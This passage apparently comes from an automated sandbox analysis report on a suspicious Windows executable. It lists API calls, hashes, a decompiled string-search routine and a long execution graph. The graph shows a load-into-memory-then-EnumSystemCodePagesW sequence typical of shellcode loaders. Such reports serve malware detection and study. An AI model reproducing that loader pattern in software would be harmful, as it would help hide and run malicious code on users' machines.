                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CF4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\qHpeBvr9cR.exe,C:\Users\user\Desktop\qHpeBvr9cR.exe,80000000,00000003), ref: 0040583B
                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CF4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\qHpeBvr9cR.exe,C:\Users\user\Desktop\qHpeBvr9cR.exe,80000000,00000003), ref: 00405849
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrlen
                                              • String ID: C:\Users\user\Desktop
                                              • API String ID: 2709904686-1246513382
                                              • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                              • Instruction ID: d70a425eade4063b78d7fa64a6a9160d8ae63170ea867be96e5b455a3914fe1f
                                              • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                              • Instruction Fuzzy Hash: 01D05E634189A02EE30376509C04B8B6A48CF12340F198462E940A2190C2784C418BAD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00405947 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00405947(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                              0x00405953
                                              0x00405955
                                              0x0040597d
                                              0x00405962
                                              0x00405967
                                              0x00405972
                                              0x00000000
                                              0x0040598f
                                              0x0040597b
                                              0x0040597b
                                              0x00000000

                                              APIs
                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040594E
                                              • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405967
                                              • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405975
                                              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040597E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: lstrlen$CharNextlstrcmpi
                                              • String ID:
                                              • API String ID: 190613189-0
                                              • Opcode ID: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
                                              • Instruction ID: 50b9e356db97d407f8629b59342efd8dd4fdec4619503af860e0f04522e7a9f7
                                              • Opcode Fuzzy Hash: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
                                              • Instruction Fuzzy Hash: C1F0A776209D51EFC2026B255C04D7BBF94EF91324B24057BF440F2180D3399815DBBB
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:1.4%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:2.7%
                                              Total number of Nodes:1542
                                              Total number of Limit Nodes:20
                                              execution_graph 9769 b1d1b0 9770 b1d1bc __FrameHandler3::FrameUnwindToState 9769->9770 9795 b1d45b 9770->9795 9772 b1d1c3 9773 b1d316 9772->9773 9784 b1d1ed ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 9772->9784 9859 b1d72c IsProcessorFeaturePresent 9773->9859 9775 b1d31d 9863 b1ff5a 9775->9863 9780 b1d20c 9781 b1d28d 9806 b1d6a8 9781->9806 9783 b1d293 9810 b118d0 9783->9810 9784->9780 9784->9781 9842 b1ffa4 9784->9842 9790 b1d2b3 9791 b1d2bc 9790->9791 9850 b1ff86 9790->9850 9853 b1d494 9791->9853 9796 b1d464 9795->9796 9869 b1d945 IsProcessorFeaturePresent 9796->9869 9800 b1d475 9805 b1d479 9800->9805 9879 b1fe57 9800->9879 9803 b1d490 9803->9772 9805->9772 10166 b1fc30 9806->10166 9808 b1d6bb GetStartupInfoW 9809 b1d6ce 9808->9809 9809->9783 9811 b11932 __FrameHandler3::FrameUnwindToState ___std_exception_copy 9810->9811 9812 b11966 CreateFileW GetFileSize VirtualAlloc ReadFile 9811->9812 9835 b1193f 9811->9835 9813 b11a20 EnumSystemCodePagesW 9812->9813 10168 b20f4d 9813->10168 9818 b11b5c __CreateFrameInfo 9819 b11e83 9818->9819 9818->9835 9838 b21341 51 API calls 9818->9838 9819->9835 10171 b12080 9819->10171 9821 b11ee2 9822 b11fa5 9821->9822 9823 b11f09 GetStdHandle GetStdHandle 9821->9823 9821->9835 10187 b123e0 GetACP TranslateCharsetInfo 9822->10187 9825 b11f40 9823->9825 9827 b11f91 9825->9827 10175 b122b0 9825->10175 10215 b12980 9827->10215 9829 b11fcb GetStartupInfoW 9832 b11fe8 9829->9832 9831 b11f6b 10183 b12340 9831->10183 10199 b12750 9832->10199 9848 b1d6d9 GetModuleHandleW 9835->9848 9838->9818 9839 b11f85 9839->9835 9843 b1ffba __FrameHandler3::FrameUnwindToState _unexpected 9842->9843 9843->9781 10556 b225ec GetLastError 9843->10556 9849 b1d2af 9848->9849 9849->9775 9849->9790 10659 b200f1 9850->10659 9854 b1d4a0 9853->9854 9855 b1d2c4 9854->9855 10734 b1fe69 9854->10734 9855->9780 9857 b1d4ae 9858 b1de6e ___scrt_uninitialize_crt 7 API calls 9857->9858 9858->9855 9860 b1d742 __FrameHandler3::FrameUnwindToState 9859->9860 9861 b1d7ed IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9860->9861 9862 b1d838 __FrameHandler3::FrameUnwindToState 9861->9862 9862->9775 9864 b200f1 __FrameHandler3::FrameUnwindToState 23 API calls 9863->9864 9865 b1d323 9864->9865 9866 b1ff70 9865->9866 9867 b200f1 __FrameHandler3::FrameUnwindToState 23 API calls 9866->9867 9868 b1d32b 9867->9868 9870 b1d470 9869->9870 9871 b1de4f 9870->9871 9888 b21da7 9871->9888 9875 b1de60 9876 b1de6b 9875->9876 9902 b21de3 9875->9902 9876->9800 9878 b1de58 9878->9800 9942 b236fd 9879->9942 9882 b1de6e 9883 b1de81 9882->9883 9884 b1de77 9882->9884 9883->9805 9885 b21c53 ___vcrt_uninitialize_ptd 6 API calls 9884->9885 9886 b1de7c 9885->9886 9887 b21de3 ___vcrt_uninitialize_locks DeleteCriticalSection 9886->9887 9887->9883 9889 b21db0 9888->9889 9891 b21dd9 9889->9891 9893 b1de54 9889->9893 9906 b2603f 9889->9906 9892 b21de3 ___vcrt_uninitialize_locks DeleteCriticalSection 9891->9892 9892->9893 9893->9878 9894 b21c20 9893->9894 9923 b25f50 9894->9923 9899 b21c50 9899->9875 9901 b21c35 9901->9875 9903 b21e0d 9902->9903 9904 b21dee 9902->9904 9903->9878 9905 b21df8 DeleteCriticalSection 9904->9905 9905->9903 9905->9905 9911 b260d1 9906->9911 9909 b26077 InitializeCriticalSectionAndSpinCount 9910 b26062 9909->9910 9910->9889 9912 b260f2 9911->9912 9913 b26059 9911->9913 9912->9913 9914 b2615a GetProcAddress 9912->9914 9916 b2614b 9912->9916 9918 b26086 LoadLibraryExW 9912->9918 9913->9909 9913->9910 9914->9913 9916->9914 9917 b26153 FreeLibrary 9916->9917 9917->9914 9919 b260cd 9918->9919 9920 b2609d GetLastError 9918->9920 9919->9912 9920->9919 9921 b260a8 ___vcrt_InitializeCriticalSectionEx 9920->9921 9921->9919 9922 b260be LoadLibraryExW 9921->9922 9922->9912 9924 b260d1 ___vcrt_InitializeCriticalSectionEx 5 API calls 9923->9924 9925 b25f6a 9924->9925 9926 b25f83 TlsAlloc 9925->9926 9927 b21c2a 9925->9927 9927->9901 9928 b26001 9927->9928 9929 b260d1 ___vcrt_InitializeCriticalSectionEx 5 API calls 9928->9929 9930 b2601b 9929->9930 9931 b26036 TlsSetValue 9930->9931 9932 b21c43 9930->9932 9931->9932 9932->9899 9933 b21c53 9932->9933 9934 b21c63 9933->9934 9935 b21c5d 9933->9935 9934->9901 9937 b25f8b 9935->9937 9938 b260d1 ___vcrt_InitializeCriticalSectionEx 5 API calls 9937->9938 9939 b25fa5 9938->9939 9940 b25fbd TlsFree 9939->9940 9941 b25fb1 9939->9941 9940->9941 9941->9934 9943 b2370d 9942->9943 9944 b1d482 9942->9944 9943->9944 9946 b22bcf 9943->9946 9944->9803 9944->9882 9947 b22bdb __FrameHandler3::FrameUnwindToState 9946->9947 9958 b2255d EnterCriticalSection 9947->9958 9949 b22be2 9959 b25d10 9949->9959 9952 b22c00 9983 b22c26 9952->9983 9958->9949 9960 b25d1c __FrameHandler3::FrameUnwindToState 9959->9960 9961 b25d46 9960->9961 9962 b25d25 9960->9962 9986 b2255d EnterCriticalSection 9961->9986 9994 b247e4 9962->9994 9967 b25d7e 10000 b25da5 9967->10000 9968 b22bf1 9968->9952 9972 b22c5b GetStartupInfoW 9968->9972 9969 b25d52 9969->9967 9987 b25c60 9969->9987 9973 b22c78 9972->9973 9974 b22bfb 9972->9974 9973->9974 9975 b25d10 30 API calls 9973->9975 9978 b22d11 9974->9978 9976 b22ca0 9975->9976 9976->9974 9977 b22cd0 GetFileType 9976->9977 9977->9976 9979 b22d18 9978->9979 9980 b22d5b GetStdHandle 9979->9980 9981 b22dbd 9979->9981 9982 b22d6e GetFileType 9979->9982 9980->9979 9981->9952 9982->9979 10165 b22574 LeaveCriticalSection 9983->10165 9985 b22c11 9985->9943 9986->9969 10003 b24871 9987->10003 9989 b25c7f 10015 b236c3 9989->10015 9990 b25c72 9990->9989 10010 b22250 9990->10010 10048 b2273d GetLastError 9994->10048 9996 b247e9 9997 b23796 9996->9997 10112 b239c8 9997->10112 9999 b237a2 9999->9968 10164 b22574 LeaveCriticalSection 10000->10164 10002 b25dac 10002->9968 10008 b2487e _unexpected 10003->10008 10004 b248be 10006 b247e4 ___std_exception_copy 13 API calls 10004->10006 10005 b248a9 RtlAllocateHeap 10007 b248bc 10005->10007 10005->10008 10006->10007 10007->9990 10008->10004 10008->10005 10021 b239ff 10008->10021 10034 b22434 10010->10034 10012 b2226c 10013 b2228a InitializeCriticalSectionAndSpinCount 10012->10013 10014 b22275 10012->10014 10013->10014 10014->9990 10016 b236ce HeapFree 10015->10016 10020 b236f8 10015->10020 10017 b236e3 GetLastError 10016->10017 10016->10020 10018 b236f0 ___free_lconv_mon 10017->10018 10019 b247e4 ___std_exception_copy 12 API calls 10018->10019 10019->10020 10020->9969 10024 b23a3b 10021->10024 10025 b23a47 __FrameHandler3::FrameUnwindToState 10024->10025 10030 b2255d EnterCriticalSection 10025->10030 10027 b23a52 10031 b23a8e 10027->10031 10030->10027 10032 b22574 __FrameHandler3::FrameUnwindToState LeaveCriticalSection 10031->10032 10033 b23a0a 10032->10033 10033->10008 10035 b22462 10034->10035 10039 b2245e _unexpected 10034->10039 10035->10039 10040 b22369 10035->10040 10038 b2247c GetProcAddress 10038->10039 10039->10012 10041 b2237a ___vcrt_InitializeCriticalSectionEx 10040->10041 10042 b22410 10041->10042 10043 b22398 LoadLibraryExW 10041->10043 10047 b223e6 LoadLibraryExW 10041->10047 10042->10038 10042->10039 10044 b223b3 GetLastError 10043->10044 10045 b22417 10043->10045 10044->10041 10045->10042 10046 b22429 FreeLibrary 10045->10046 10046->10042 10047->10041 10047->10045 10049 b22753 10048->10049 10050 b22759 10048->10050 10071 b221cf 10049->10071 10054 b2275d SetLastError 10050->10054 10076 b2220e 10050->10076 10054->9996 10056 b24871 _unexpected 12 API calls 10057 b2278a 10056->10057 10058 b22792 10057->10058 10059 b227a3 10057->10059 10060 b2220e _unexpected 6 API calls 10058->10060 10061 b2220e _unexpected 6 API calls 10059->10061 10069 b227a0 10060->10069 10062 b227af 10061->10062 10063 b227b3 10062->10063 10064 b227ca 10062->10064 10067 b2220e _unexpected 6 API calls 10063->10067 10081 b228fd 10064->10081 10065 b236c3 ___free_lconv_mon 12 API calls 10065->10054 10067->10069 10069->10065 10070 b236c3 ___free_lconv_mon 12 API calls 10070->10054 10072 b22434 _unexpected 5 API calls 10071->10072 10073 b221eb 10072->10073 10074 b22206 TlsGetValue 10073->10074 10075 b221f4 10073->10075 10075->10050 10077 b22434 _unexpected 5 API calls 10076->10077 10078 b2222a 10077->10078 10079 b22233 10078->10079 10080 b22248 TlsSetValue 10078->10080 10079->10054 10079->10056 10086 b22a63 10081->10086 10087 b22a6f __FrameHandler3::FrameUnwindToState 10086->10087 10100 b2255d EnterCriticalSection 10087->10100 10089 b22a79 10101 b22aa9 10089->10101 10092 b22ab5 10093 b22ac1 __FrameHandler3::FrameUnwindToState 10092->10093 10104 b2255d EnterCriticalSection 10093->10104 10095 b22acb 10105 b228b2 10095->10105 10097 b22ae3 10109 b22b03 10097->10109 10100->10089 10102 b22574 __FrameHandler3::FrameUnwindToState LeaveCriticalSection 10101->10102 10103 b2296b 10102->10103 10103->10092 10104->10095 10106 b228e8 _unexpected 10105->10106 10107 b228c1 _unexpected 10105->10107 10106->10097 10107->10106 10108 b24d84 _unexpected 14 API calls 10107->10108 10108->10106 10110 b22574 __FrameHandler3::FrameUnwindToState LeaveCriticalSection 10109->10110 10111 b227d5 10110->10111 10111->10070 10113 b239da ___std_exception_copy 10112->10113 10116 b23922 10113->10116 10115 b239f2 ___std_exception_copy 10115->9999 10117 b23932 10116->10117 10118 b23939 10116->10118 10125 b214f0 GetLastError 10117->10125 10123 b23947 10118->10123 10129 b2399f 10118->10129 10121 b2396e 10121->10123 10132 b237a6 IsProcessorFeaturePresent 10121->10132 10123->10115 10124 b2399e 10126 b21509 10125->10126 10136 b227ee 10126->10136 10130 b239c3 10129->10130 10131 b239aa GetLastError SetLastError 10129->10131 10130->10121 10131->10121 10133 b237b2 10132->10133 10158 b237da 10133->10158 10137 b22801 10136->10137 10138 b22807 10136->10138 10140 b221cf _unexpected 6 API calls 10137->10140 10139 b2220e _unexpected 6 API calls 10138->10139 10142 b21525 SetLastError 10138->10142 10141 b22821 10139->10141 10140->10138 10141->10142 10143 b24871 _unexpected 14 API calls 10141->10143 10142->10118 10144 b22831 10143->10144 10145 b22839 10144->10145 10146 b2284e 10144->10146 10147 b2220e _unexpected 6 API calls 10145->10147 10148 b2220e _unexpected 6 API calls 10146->10148 10149 b22845 10147->10149 10150 b2285a 10148->10150 10154 b236c3 ___free_lconv_mon 14 API calls 10149->10154 10151 b2285e 10150->10151 10152 b2286d 10150->10152 10155 b2220e _unexpected 6 API calls 10151->10155 10153 b228fd _unexpected 14 API calls 10152->10153 10156 b22878 10153->10156 10154->10142 10155->10149 10157 b236c3 ___free_lconv_mon 14 API calls 10156->10157 10157->10142 10159 b237f6 __FrameHandler3::FrameUnwindToState 10158->10159 10160 b23822 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10159->10160 10163 b238f3 __FrameHandler3::FrameUnwindToState 10160->10163 10161 b1db25 _ValidateLocalCookies 5 API calls 10162 b237c7 GetCurrentProcess TerminateProcess 10161->10162 10162->10124 10163->10161 10164->10002 10165->9985 10167 b1fc47 10166->10167 10167->9808 10167->10167 10169 b236c3 ___free_lconv_mon 14 API calls 10168->10169 10170 b11b02 GetOEMCP 10169->10170 10170->9818 10172 b120a6 __CreateFrameInfo ___std_exception_copy 10171->10172 10173 b20f4d ___std_exception_destroy 14 API calls 10172->10173 10174 b120b2 CatchIt 10172->10174 10173->10174 10174->9821 10176 b11f5b 10175->10176 10177 b122c6 10175->10177 10176->9827 10176->9831 10228 b17480 10177->10228 10179 b122e3 10235 b17930 10179->10235 10182 b17480 4 API calls 10182->10176 10184 b12365 10183->10184 10185 b11f79 10183->10185 10184->10185 10186 b12375 CreateThread 10184->10186 10185->9827 10185->9839 10186->10185 10188 b12437 GetStartupInfoW 10187->10188 10198 b11fb3 10187->10198 10192 b12468 ___std_exception_copy 10188->10192 10190 b12575 GetModuleHandleW LoadIconW 10193 b12635 GetStockObject RegisterClassW CreateWindowExW 10190->10193 10192->10198 10249 b13370 10192->10249 10194 b126fe 10193->10194 10193->10198 10197 b1271e 10194->10197 10252 b14940 10194->10252 10258 b14ab0 10197->10258 10198->9829 10198->9839 10200 b12773 ___std_exception_copy CatchIt 10199->10200 10201 b20f4d ___std_exception_destroy 14 API calls 10200->10201 10203 b12004 ShowWindow 10200->10203 10202 b127d2 10201->10202 10205 b17480 4 API calls 10202->10205 10214 b12933 10202->10214 10203->9827 10204 b12946 SetWindowTextW 10204->10203 10206 b1280b 10205->10206 10207 b1282e WideCharToMultiByte 10206->10207 10209 b1288c 10207->10209 10208 b12908 10210 b17480 4 API calls 10208->10210 10209->10208 10211 b128c4 WideCharToMultiByte 10209->10211 10212 b12925 10210->10212 10211->10208 10213 b173a0 4 API calls 10212->10213 10213->10214 10214->10203 10214->10204 10216 b129a5 CreateEventW 10215->10216 10217 b129e7 10215->10217 10216->10217 10225 b129db 10216->10225 10217->10225 10548 b18c20 10217->10548 10219 b12af0 MsgWaitForMultipleObjects 10227 b12a6b 10219->10227 10220 b12b28 WaitForMultipleObjects 10220->10227 10221 b12bf6 EnterCriticalSection 10552 b18c90 10221->10552 10222 b12b69 PeekMessageW 10222->10227 10224 b12bb9 DispatchMessageW 10224->10222 10225->9835 10227->10219 10227->10220 10227->10221 10227->10222 10227->10224 10227->10225 10229 b1749a 10228->10229 10234 b174aa CatchIt 10228->10234 10230 b174d1 10229->10230 10229->10234 10244 b175b0 10229->10244 10232 b17546 WriteFile 10230->10232 10230->10234 10233 b17587 GetLastError 10232->10233 10232->10234 10233->10234 10234->10179 10236 b17956 10235->10236 10241 b17a0a _strlen 10235->10241 10237 b17a12 10236->10237 10240 b17965 _strlen 10236->10240 10239 b17480 4 API calls 10237->10239 10238 b122ff 10238->10182 10239->10241 10242 b17480 4 API calls 10240->10242 10241->10238 10243 b17480 4 API calls 10241->10243 10242->10241 10243->10238 10245 b175da 10244->10245 10246 b175ca 10244->10246 10245->10230 10246->10245 10247 b175df WriteFile 10246->10247 10247->10245 10248 b17629 GetLastError 10247->10248 10248->10245 10250 b13399 __FrameHandler3::FrameUnwindToState CatchIt 10249->10250 10251 b133bb GetDpiForSystem MulDiv GetDpiForSystem MulDiv 10250->10251 10251->10190 10255 b1496e __FrameHandler3::FrameUnwindToState 10252->10255 10253 b149e9 CatchIt 10270 b1c3b0 10253->10270 10254 b149a6 EnumFontFamiliesExW 10254->10253 10254->10255 10255->10253 10255->10254 10257 b14a9f 10257->10197 10263 b14ad3 __FrameHandler3::FrameUnwindToState ___std_exception_copy 10258->10263 10259 b14cad CatchIt 10261 b14ed6 10259->10261 10318 b12ce0 10259->10318 10322 b18e70 10261->10322 10263->10259 10265 b14c9c 10263->10265 10267 b20f4d ___std_exception_destroy 14 API calls 10263->10267 10268 b20f4d ___std_exception_destroy 14 API calls 10265->10268 10267->10263 10268->10259 10271 b1c424 10270->10271 10272 b1c3c6 RegCreateKeyW 10270->10272 10273 b1c4c0 28 API calls 10271->10273 10274 b1c3f1 10272->10274 10275 b1c3ec RegCloseKey 10272->10275 10273->10275 10279 b1c4c0 10274->10279 10275->10257 10280 b1c4de 10279->10280 10283 b1c4f6 10279->10283 10281 b13370 4 API calls 10280->10281 10281->10283 10282 b1c5e1 10285 b1c5fd RegSetValueExW 10282->10285 10286 b1c646 10282->10286 10283->10282 10284 b1c556 wsprintfW RegSetValueExW 10283->10284 10284->10283 10285->10286 10287 b1c662 RegSetValueExW 10286->10287 10288 b1c6ab 10286->10288 10287->10288 10289 b1c6c7 RegSetValueExW 10288->10289 10290 b1c713 10288->10290 10289->10290 10291 b1c74a lstrlenW RegSetValueExW 10290->10291 10292 b1c71d lstrcmpW 10290->10292 10293 b1c7a0 10291->10293 10292->10291 10292->10293 10294 b1c7bc RegSetValueExW 10293->10294 10295 b1c808 10293->10295 10294->10295 10296 b1c836 GetDpiForSystem MulDiv GetDpiForSystem MulDiv RegSetValueExW 10295->10296 10297 b1c8ef 10295->10297 10296->10297 10298 b1c90b RegSetValueExW 10297->10298 10299 b1c957 10297->10299 10298->10299 10300 b1c970 RegSetValueExW 10299->10300 10301 b1c9b9 10299->10301 10300->10301 10302 b1c9d2 RegSetValueExW 10301->10302 10303 b1ca1b 10301->10303 10302->10303 10304 b1ca34 RegSetValueExW 10303->10304 10305 b1ca7d 10303->10305 10304->10305 10306 b1ca96 RegSetValueExW 10305->10306 10307 b1cadf 10305->10307 10306->10307 10308 b1caf8 RegSetValueExW 10307->10308 10309 b1cb41 10307->10309 10308->10309 10310 b1cb5a RegSetValueExW 10309->10310 10311 b1cba3 10309->10311 10310->10311 10312 b1cbcb RegSetValueExW 10311->10312 10313 b1cc30 10311->10313 10312->10313 10314 b1cc4c RegSetValueExW 10313->10314 10316 b1cc95 10313->10316 10314->10316 10315 b1ccbd RegSetValueExW 10317 b1c40d RegCloseKey 10315->10317 10316->10315 10316->10317 10317->10275 10319 b12d1e 10318->10319 10363 b12e20 10319->10363 10323 b18ef8 10322->10323 10324 b18eac 10322->10324 10325 b1908e 10323->10325 10329 b18f55 GetDC 10323->10329 10324->10323 10327 b190af 10324->10327 10328 b18eda IsWindowVisible 10324->10328 10388 b16c30 SetRect 10325->10388 10330 b1911d GetWindowLongW AdjustWindowRect 10327->10330 10334 b194bb 10327->10334 10328->10323 10328->10327 10333 b18f7b CreateCompatibleBitmap ReleaseDC SelectObject 10329->10333 10358 b14ee4 10329->10358 10331 b19281 ShowScrollBar 10330->10331 10332 b191cf GetSystemMetrics SetScrollRange SetScrollPos ShowScrollBar 10330->10332 10335 b192a8 10331->10335 10332->10335 10336 b19014 DeleteObject 10333->10336 10337 b1902c SetRect 10333->10337 10340 b194f7 ScrollWindow SetScrollPos SetScrollPos InvalidateRect 10334->10340 10344 b195ff 10334->10344 10338 b1936a ShowScrollBar 10335->10338 10339 b192ba GetSystemMetrics SetScrollRange SetScrollPos ShowScrollBar 10335->10339 10336->10337 10378 b1b280 10337->10378 10342 b19391 SetWindowPos SystemParametersInfoW GetSystemMetrics InvalidateRect UpdateWindow 10338->10342 10339->10342 10340->10344 10342->10344 10343 b1977f 10345 b197c4 10343->10345 10390 b1b420 10343->10390 10344->10343 10347 b1b280 18 API calls 10344->10347 10348 b197e2 GetFocus 10345->10348 10355 b1987b 10345->10355 10349 b19720 10347->10349 10351 b19816 10348->10351 10348->10355 10389 b16c30 SetRect 10349->10389 10353 b19883 DestroyCaret 10351->10353 10354 b19829 CreateCaret 10351->10354 10352 b19741 InvalidateRect UpdateWindow 10352->10343 10353->10355 10399 b1a510 10354->10399 10357 b1a510 3 API calls 10355->10357 10355->10358 10357->10358 10359 b117c0 10358->10359 10361 b117d4 10359->10361 10360 b11832 10360->10198 10361->10360 10404 b11000 10361->10404 10364 b12f22 GetDC 10363->10364 10369 b12e51 10363->10369 10365 b12f52 CreateFontIndirectW 10364->10365 10374 b12d33 10364->10374 10366 b12f98 SelectObject GetTextMetricsW 10365->10366 10367 b12f6d ReleaseDC 10365->10367 10368 b12fe7 GetTextFaceW SelectObject ReleaseDC 10366->10368 10367->10374 10370 b20f4d ___std_exception_destroy 14 API calls 10368->10370 10369->10364 10369->10374 10371 b13094 ___std_exception_copy CatchIt 10370->10371 10372 b130d2 GetCPInfo 10371->10372 10373 b130fa 10372->10373 10375 b13126 DeleteObject 10373->10375 10376 b1313e 10373->10376 10374->10261 10375->10376 10376->10374 10377 b1316f DeleteObject 10376->10377 10377->10374 10379 b1b29f ___std_exception_copy 10378->10379 10380 b1b2b2 10378->10380 10379->10380 10381 b1b2fa SelectObject 10379->10381 10380->10325 10382 b1b330 10381->10382 10383 b1b3d9 SelectObject 10382->10383 10385 b1b356 SetBkColor SetTextColor 10382->10385 10384 b20f4d ___std_exception_destroy 14 API calls 10383->10384 10386 b1b402 10384->10386 10385->10382 10387 b20f4d ___std_exception_destroy 14 API calls 10386->10387 10387->10380 10388->10327 10389->10352 10391 b1b447 GetFocus 10390->10391 10392 b1b46c 10390->10392 10391->10392 10393 b1b466 DestroyCaret 10391->10393 10394 b1b47f DeleteObject 10392->10394 10397 b1b497 __CreateFrameInfo 10392->10397 10393->10392 10394->10397 10395 b1b508 10395->10345 10396 b1b603 CreateBitmap 10398 b20f4d ___std_exception_destroy 14 API calls 10396->10398 10397->10395 10397->10396 10398->10395 10400 b1a529 GetFocus 10399->10400 10401 b1a548 10399->10401 10400->10401 10402 b1a54d 10400->10402 10401->10355 10403 b1a580 SetCaretPos ShowCaret 10402->10403 10403->10401 10405 b11028 10404->10405 10406 b1101c 10404->10406 10408 b1105e CatchIt 10405->10408 10410 b20fdc 10405->10410 10406->10360 10408->10406 10423 b11200 10408->10423 10411 b25e23 10410->10411 10412 b25e30 10411->10412 10413 b25e3b 10411->10413 10440 b248ce 10412->10440 10414 b25e43 10413->10414 10422 b25e4c _unexpected 10413->10422 10416 b236c3 ___free_lconv_mon 14 API calls 10414->10416 10419 b25e38 10416->10419 10417 b25e51 10420 b247e4 ___std_exception_copy 14 API calls 10417->10420 10418 b25e76 HeapReAlloc 10418->10419 10418->10422 10419->10408 10420->10419 10421 b239ff _unexpected 2 API calls 10421->10422 10422->10417 10422->10418 10422->10421 10438 b11240 CatchIt 10423->10438 10424 b1126e CatchIt 10427 b115d2 10424->10427 10454 b150a0 10424->10454 10425 b115e4 __FrameHandler3::FrameUnwindToState 10425->10406 10427->10425 10428 b11649 10427->10428 10429 b1161b 10427->10429 10431 b11635 10427->10431 10433 b11678 10428->10433 10475 b154f0 10428->10475 10432 b14f00 16 API calls 10429->10432 10436 b20f4d ___std_exception_destroy 14 API calls 10431->10436 10432->10431 10479 b15690 10433->10479 10437 b11778 10436->10437 10439 b20f4d ___std_exception_destroy 14 API calls 10437->10439 10438->10424 10447 b14f00 10438->10447 10439->10425 10441 b2490c 10440->10441 10445 b248dc _unexpected 10440->10445 10442 b247e4 ___std_exception_copy 14 API calls 10441->10442 10444 b2490a 10442->10444 10443 b248f7 RtlAllocateHeap 10443->10444 10443->10445 10444->10419 10445->10441 10445->10443 10446 b239ff _unexpected 2 API calls 10445->10446 10446->10445 10448 b14f28 10447->10448 10453 b14f23 CatchIt 10447->10453 10449 b14f35 10448->10449 10450 b14fcd 10448->10450 10451 b15690 16 API calls 10449->10451 10452 b15690 16 API calls 10450->10452 10450->10453 10451->10453 10452->10453 10453->10438 10483 b16c30 SetRect 10454->10483 10456 b150d8 10458 b152c8 10456->10458 10484 b16c80 10456->10484 10461 b15387 10458->10461 10492 b16e90 10458->10492 10460 b154b1 10518 b173a0 10460->10518 10464 b1545d 10461->10464 10469 b15472 10461->10469 10498 b16f40 10461->10498 10462 b16f40 4 API calls 10462->10460 10506 b17040 10464->10506 10465 b15188 10465->10458 10488 b16d30 10465->10488 10469->10460 10469->10462 10472 b150fa 10472->10465 10474 b16d30 8 API calls 10472->10474 10474->10472 10476 b15516 ___std_exception_copy CatchIt 10475->10476 10478 b15511 CatchIt 10475->10478 10477 b20f4d ___std_exception_destroy 14 API calls 10476->10477 10476->10478 10477->10478 10478->10433 10480 b156c6 10479->10480 10482 b156ba 10479->10482 10481 b20fdc 16 API calls 10480->10481 10481->10482 10482->10431 10483->10456 10485 b16cb6 10484->10485 10486 b16c99 10484->10486 10485->10472 10487 b17480 4 API calls 10486->10487 10487->10485 10489 b16d55 10488->10489 10490 b16e90 8 API calls 10489->10490 10491 b16d93 10489->10491 10490->10491 10491->10465 10493 b16eb9 10492->10493 10494 b16ef7 